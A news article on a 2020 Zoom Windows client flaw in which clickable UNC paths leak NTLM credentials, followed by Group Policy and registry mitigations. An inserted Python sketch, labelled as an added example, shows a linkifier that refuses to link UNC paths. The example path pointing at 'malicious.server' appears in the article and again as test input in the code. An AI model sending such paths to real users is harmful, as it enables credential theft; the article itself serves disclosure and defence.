Zoom security vulnerability can be used to steal Windows login credentials
Zoom's popularity has accelerated in recent weeks thanks to the number of people now forced to work from home and conduct meetings online. Now security researchers have discovered a worrying vulnerability in the software that could be used to steal Windows login credentials.
The vulnerability stems from the fact that Zoom converts URLs that are sent in messages into clickable links. The same is true for UNC paths, and if such a link is clicked, it is possible to grab a user's login name and their NTLM password hash and decrypt it.
As reported by Bleeping Computer, security researcher g0dmode (or Mitch) and Matthew Hickey (@HackerFantastic) both discovered the vulnerability and the potential havoc it could wreak. If someone sends a message that takes the form \\malicious.server\media\image.jpg, another user may click it expecting to see an image (or, perhaps they would if the UNC path was named slightly less obviously!).
When the link is clicked, Windows will try to connect to the path, even if it doesn't actually exist. While attempting to connect using the SMB protocol, the user's login name and their NTLM password hash are sent, and these can be intercepted and decrypted with relative ease.
Hickey shared details of his findings on Twitter:
Hi @zoom_us & @NCSC - here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screen shot below shows an example UNC path link and the credentials being exposed (redacted). pic.twitter.com/gjWXas7TMO
— Hacker Fantastic (@hackerfantastic) March 31, 2020
Hickey has notified Zoom of this issue, and also the fact that the same technique could be used to launch applications on a remote computer. He says: "Zoom should not render UNC paths as hyperlinks is the fix, I have notified Zoom as I disclosed it on Twitter".
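The fix Hickey describes, not rendering UNC paths as hyperlinks, can be sketched as an allow-list linkifier that only ever links http(s) URLs and reports UNC-style tokens for logging. This is an added example, not Zoom's code or anything from the original article; `classify`, `find_unc_paths` and `render_message` are hypothetical names.

```python
import html
import re

# Tokens that make Windows open an SMB connection when activated:
# \\host\share, //host/share, mixed separators, and any file: URL.
UNC_RE = re.compile(r"^[\\/]{2}[^\\/\s]+(?:[\\/]\S*)?$")
FILE_URL_RE = re.compile(r"^file:", re.IGNORECASE)
# Allow-list: only plain http(s) URLs are ever turned into links.
WEB_URL_RE = re.compile(
    r"^https?://[A-Za-z0-9.-]+(?::\d+)?(?:[/?#]\S*)?$", re.IGNORECASE
)


def classify(token: str) -> str:
    """Return 'unc', 'web' or 'text' for one whitespace-delimited token."""
    if UNC_RE.match(token) or FILE_URL_RE.match(token):
        return "unc"
    if WEB_URL_RE.match(token):
        return "web"
    return "text"


def find_unc_paths(message: str) -> list:
    """List UNC-style tokens in a message, e.g. for logging or alerting."""
    return [t for t in message.split() if classify(t) == "unc"]


def render_message(message: str) -> str:
    """Render a chat message as HTML, linking only http(s) URLs."""
    out = []
    for token in re.split(r"(\s+)", message):  # keep the whitespace runs
        safe = html.escape(token, quote=True)
        if classify(token) == "web":
            out.append(f'<a href="{safe}" rel="noopener noreferrer">{safe}</a>')
        else:
            out.append(safe)  # UNC paths and everything else stay inert text
    return "".join(out)


if __name__ == "__main__":
    # Constructed sample message using the path form quoted in the article.
    sample = r"photo: \\malicious.server\media\image.jpg or https://example.com/"
    print(find_unc_paths(sample))
    print(render_message(sample))
```

Because linking is decided by the allow-list rather than by a UNC deny-list, schemes the code does not recognise also stay plain text.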
There is a way to mitigate this security vulnerability, as Bleeping Computer explains. In Group Policy Editor, you can navigate to Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options > Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers, and select Deny all.
If you don't have access to Group Policy Editor, fire up the Registry Editor, head to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 and create a new DWORD value called RestrictSendingNTLMTraffic, giving it a value of 2.